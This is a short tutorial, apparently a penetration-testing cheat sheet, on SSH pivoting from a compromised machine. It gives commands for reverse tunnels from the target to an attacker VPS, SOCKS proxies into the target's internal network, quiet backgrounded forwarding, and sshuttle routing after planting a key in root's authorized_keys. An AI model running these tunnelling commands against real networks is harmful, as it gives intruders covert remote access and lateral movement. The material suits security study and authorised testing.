SSH Pivoting

SSH pivoting involves combining various SSH port forwarding methods to access internal networks through an intermediary server, such as a VPS, from a compromised machine. This method allows you to traverse network boundaries and access internal resources.

We can use port 5555 or any other in the VPS for reverse SSH tunneling, forwarding connections from the VPS to the target machine's SSH port. Traffic on port 5555 would be visible only on the VPS, not on the target machine, which will see only SSH traffic.

- Connect back

To connect back from the VPS to the compromised target machine encapsulating traffic through SSH.

In target:

ssh -R 5555:localhost:22 root@{VPS_IP}

In VPS:

ssh -p 5555 root@localhost

- Socks in VPS:

To set up a socks proxy in the VPS and access the target's internal network. Allows to run tools from the VPS against the target's internal network.

In target:

ssh -R 5555 root@{VPS_IP}

In VPS:

ssh -D 1080 -p 5555 root@localhost

Then, to access the internal target network within the VPS, use proxy in localhost port 1080.

- Socks in local machine (VPS intermediary):

To set up a socks proxy in the local attacker machine, using the VPS to route traffic through the reverse tunnel to access the target's internal network. Allows to run tools from the local machine against the target's internal network.

In target:

.\ssh.exe -R 5555 root@{VPS IP}

In local machine:

.\ssh.exe -L 0.0.0.0:1080:127.0.0.1:5555 root@{VPS IP} -fCnNq

The SSH command options -fCnNq enable the following: -f puts SSH into the background just before command execution, -C enables compression for the connection, -n redirects stdin from /dev/null, -N prevents the execution of a remote command, and -q silences most warning and diagnostic messages. These options are useful for setting up port forwarding quietly and efficiently.

Then, to access the internal target network within the local machine, use proxy in 0.0.0.0 port 1080.

- SSHuttle Transparent Proxying

sshuttle acts like a VPN, providing a way to route all your network traffic through an SSH connection. It simplifies the process of accessing remote networks and resources by transparently forwarding all TCP and DNS traffic, making the remote network appear as if it is part of your local network.

If we have already set up a proxy and have access to an SSH server with our keys (we have inserted our public key in the root's authorized keys), we can pivot directly and browse the websites only accessible from the domain of this SSH session, without needing a proxy addon:

proxychains sshuttle -v -e "ssh -i ~/.ssh/id_rsa" -r root@172.16.173.197 172.16.173.0/24